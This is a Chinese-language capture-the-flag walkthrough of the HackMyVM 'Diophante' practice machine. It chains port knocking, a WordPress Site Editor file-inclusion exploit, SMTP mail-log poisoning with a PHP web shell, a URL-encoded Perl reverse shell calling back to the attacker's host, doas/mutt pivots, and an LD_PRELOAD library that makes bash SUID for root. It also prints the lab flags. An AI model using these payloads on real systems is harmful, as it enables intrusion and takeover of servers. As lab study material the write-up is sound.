【hackmyvm】Diophante 靶场

1. 基本信息^toc

这里写目录标题

- 1. 基本信息^toc
- 2. 信息收集
- - 2.1. 端口扫描
  - 2.2. 目录扫描
  - 2.3. knock
- 3. WordPress利用
- - 3.1. wpscan扫描
  - 3.2. smtp上传后门
- 4. 提权
- - 4.1. 提权leonard用户
  - 4.2. LD劫持提权root

靶机链接 https://hackmyvm.eu/machines/machine.php?vm=Diophante
作者 cromiphi
难度 ⭐️⭐️⭐️⭐️⭐️

2. 信息收集

2.1. 端口扫描

┌──(root㉿kali)-[~]
└─# nmap 192.168.56.13 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-21 05:01 EST
Nmap scan report for 192.168.56.13
Host is up (0.0031s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE
22/tcp open     ssh
25/tcp filtered smtp
80/tcp open     http
MAC Address: 08:00:27:B8:67:CA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 28.73 seconds

25 端口被防火墙过滤了多半是需要knock

2.2. 目录扫描

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.56.13
^[[A/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.56.13/_24-12-21_05-06-58.txt

Target: http://192.168.56.13/

[05:06:58] Starting:
[05:06:59] 403 -  278B  - /.ht_wsr.txt
[05:06:59] 403 -  278B  - /.htaccess.orig
[05:06:59] 403 -  278B  - /.htaccess.bak1
[05:06:59] 403 -  278B  - /.htaccess.save
[05:06:59] 403 -  278B  - /.htaccess.sample
[05:06:59] 403 -  278B  - /.htaccess_extra
[05:06:59] 403 -  278B  - /.htaccess_orig
[05:06:59] 403 -  278B  - /.htaccess_sc
[05:06:59] 403 -  278B  - /.htaccessOLD
[05:06:59] 403 -  278B  - /.htaccessBAK
[05:06:59] 403 -  278B  - /.htaccessOLD2
[05:06:59] 403 -  278B  - /.htm
[05:06:59] 403 -  278B  - /.htpasswd_test
[05:06:59] 403 -  278B  - /.html
[05:06:59] 403 -  278B  - /.htpasswds
[05:06:59] 403 -  278B  - /.httr-oauth
[05:06:59] 403 -  278B  - /.php
[05:07:05] 301 -  313B  - /blog  ->  http://192.168.56.13/blog/
[05:07:09] 200 -    3KB - /blog/wp-login.php
[05:07:09] 200 -    5KB - /blog/
[05:07:15] 403 -  278B  - /server-status
[05:07:15] 403 -  278B  - /server-status/

Task Completed

┌──(root㉿kali)-[~/Desktop/hmv/Diophanate]
└─# gobuster dir -u http://192.168.56.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.13
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 10701]
/blog                 (Status: 301) [Size: 313] [--> http://192.168.56.13/blog/]
/note.txt             (Status: 200) [Size: 36]

2.3. knock

/note.txt

┌──(root㉿kali)-[~/Desktop/hmv/Diophanate]
└─# curl http://192.168.56.13/note.txt
Don't forget: 7000 8000 9000

admin

这应该就是要敲门的端口


┌──(root㉿kali)-[~/Desktop/hmv/Diophanate]
└─# knock 192.168.56.13 7000 8000 9000 -v
hitting tcp 192.168.56.13:7000
hitting tcp 192.168.56.13:8000
hitting tcp 192.168.56.13:9000

┌──(root㉿kali)-[~/Desktop/hmv/Diophanate]
└─# nmap 192.168.56.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-21 05:18 EST
Nmap scan report for 192.168.56.13
Host is up (0.022s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
25/tcp open  smtp
80/tcp open  http
MAC Address: 08:00:27:B8:67:CA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.90 seconds

3. WordPress利用

发现存在wp-login 路径多半存在 WordPress 服务

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

查看源码可以发现一个域名 hard
![外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传](https://img-home.csdnimg.cn/images/20230724024159.png?
添加一下

3.1. wpscan扫描

┌──(root㉿kali)-[~]
└─# wpscan --url http://hard/blog --api-token xxxxxx
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | ''_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://hard/blog/ [192.168.56.13]
[+] Started: Sat Dec 21 05:26:22 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://hard/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://hard/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://hard/blog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://hard/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7 identified (Insecure, released on 2021-03-09).
 | Found By: Rss Generator (Passive Detection)
 |  - http://hard/blog/?feed=rss2, <generator>https://wordpress.org/?v=5.7</generator>
 |  - http://hard/blog/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.7</generator>
 |
 | [!] 44 vulnerabilities identified:

[+] site-editor
 | Location: http://hard/blog/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
 |      - https://seclists.org/fulldisclosure/2018/Mar/40
 |      - https://github.com/SiteEditor/editor/issues/2
 |
 | Version: 1.1.1 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://hard/blog/wp-content/plugins/site-editor/readme.txt

里面可以检测到site-editor存在插件存在一个LFI
然后可以找到这个CVE的利用
https://www.exploit-db.com/exploits/44340
验证一下发现存在可以利用

http://192.168.56.13/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

3.2. smtp上传后门

我们获取到了一个LFI
但是现在需要利用这个弹一个shell

这里我想到了我们端口扫描时开放的25端口 SMTP邮件服务
我们利用SMTP邮件服务发送一个后门邮件然后对其进行文件包含

这里需要选择一个接受邮件的用户，用户可以在/etc/passwd里面获取

apt install postfix


┌──(root㉿kali)-[~/Desktop/hmv/Diophanate]
└─# nc 192.168.56.14 25
220 debian ESMTP Postfix (Debian/GNU)
helo xxx
250 debian
mail from:<kali>
250 2.1.0 Ok
rcpt to: sabine
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']);?>
.
250 2.0.0 Ok: queued as B952B802CC
quit
221 2.0.0 Bye

[!warning]
邮件发送过多会导致log文件损坏，需要重置靶机才行
rcpt to: sabine 后面的接受者是固定的不能任意，必须是目标靶机上的用户
mail from:<kali> 这里后面的发送者可以任意，但一定要用< >括起来

我们使用 Postfix 发送邮件：邮件通常存储在 /var/spool/mail/<用户名> 或 /var/mail/<用户名> 中。

然后访问
http://192.168.56.14/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/sabine&cmd=id
即可RCE

弹shell

curl http://192.168.56.14/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/sabine&cmd=perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.56.6%22%3B%24p%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fbash%20-i%22%29%3B%7D%3B%27


┌──(root㉿kali)-[~/Desktop/hmv/Diophanate]
└─# pwncat-cs -lp 1234

[08:40:32] Welcome to pwncat 🐈!                                                        __main__.py:164
[08:40:59] received connection from 192.168.56.14:42498                                      bind.py:84
[08:41:00] 192.168.56.14:42498: registered new host w/ db                                manager.py:957
(local) pwncat$
(remote) www-data@diophante:/var/www/html/blog/wp-content/plugins/site-editor/editor/extensions/pagebui
lder/includes$

4. 提权

4.1. 提权leonard用户

检测发现有 doas 的SUID权限
我们看看doas的配置文件

(remote) www-data@diophante:/home/leonard$ cat /etc/doas.conf
permit nopass www-data as sabine cmd /usr/bin/setsid
permit nopass sabine as leonard cmd /usr/bin/mutt

允许我们以 www-data 用户用 sabine 用户的权限执行 /usr/bin/setsid
允许我们以 sabine 用户用 leonard 用户的权限执行 /usr/bin/mutt

先利用 /usr/bin/setsid 提取到 sabine 用户

(remote) www-data@diophante:/home/leonard$ doas -u sabine /usr/bin/setsid bash
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
sabine@diophante:/home/leonard$ whoami
sabine

然后提权到 leonard 用户

sabine@diophante:/home/leonard$ doas -u leonard /usr/bin/mutt
输入！回车
leonard@diophante:~$ whoami
leonard

leonard@diophante:~$ cat user.txt
Thonirburarnlog

4.2. LD劫持提权root

leonard@diophante:~$ sudo -l
Matching Defaults entries for leonard on diophante:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=LD_PRELOAD

User leonard may run the following commands on diophante:
    (ALL : ALL) NOPASSWD: /usr/bin/ping

发现我们当前用户可以执行/usr/bin/ping
其中 env_keep+=LD_PRELOAD 运行我们进行LD劫持

当我们使用 Ping 命令时，就会调用很多动态链接库文件（.so文件）里面的函数，而 LD_PRELOAD 这个环境变量允许我们指定优先调用的动态链接库文件。
所以我们可以写一个恶意的so文件，替换里面被调用函数的功能，然后让其 ping 以root用户运行这个函数实现提权

首先我们需要获取到一个 ping 命令时一定会执行函数
ida反编译 ping
这里我选择 getopt 函数。因为他的作用是获取参数。所以基本上一定会被调用
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

编译恶意so文件

int getopt(char *s){
	setuid(0);
	setgid(0);
	system("chmod +s /bin/bash");
}

gcc a.c  -o pwn.so -shared

这里我用Kali2024的编译不行
会报错

可以换一个版本。应该是gcc版本的问题。
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

然后把编译后的 pwn.so 传上去就行了

sudo -u root LD_PRELOAD=/tmp/pwn.so /usr/bin/ping 1.1.1.1

des$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
leonard@diophante:/var/www/html/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/inclu
des$ bash -p

bash-5.0# whoami
root
bash-5.0# ls /root
root.txt
bash-5.0# cat /root/root.txt
Culcelborlus